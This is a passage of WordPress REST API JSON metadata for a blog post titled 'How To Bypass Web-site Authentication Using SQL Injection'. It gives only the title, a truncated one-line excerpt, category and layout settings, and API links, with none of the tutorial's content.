Post<\/p>\n<h1 class=\"entry-title\"><a href=\"http:\/\/zerothcode.com\/blog\/bypass-sql-injection\/\">How To Bypass Web-site Authentication Using SQL Injection<\/a><\/h1>\n","protected":false},"excerpt":{"rendered":"<p>SQL injection is one of the most common Website security Vulnerability. It is a code injection vulnerability that might dump<\/p>\n","protected":false},"author":1,"featured_media":718,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[51],"tags":[],"yst_prominent_words":[728,724,718,722,723,721,730,727,731,715,729,210,217,712,725,726,720,205,719,717],"class_list":["post-717","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-tutorials"],"_links":{"self":[{"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/posts\/717","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/comments?post=717"}],"version-history":[{"count":0,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/posts\/717\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/media\/718"}],"wp:attachment":[{"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/media?parent=717"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/categories?post=717"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/tags?post=717"},{"taxonomy":"yst_prominent_words","embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/yst_prominent_words?post=717"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}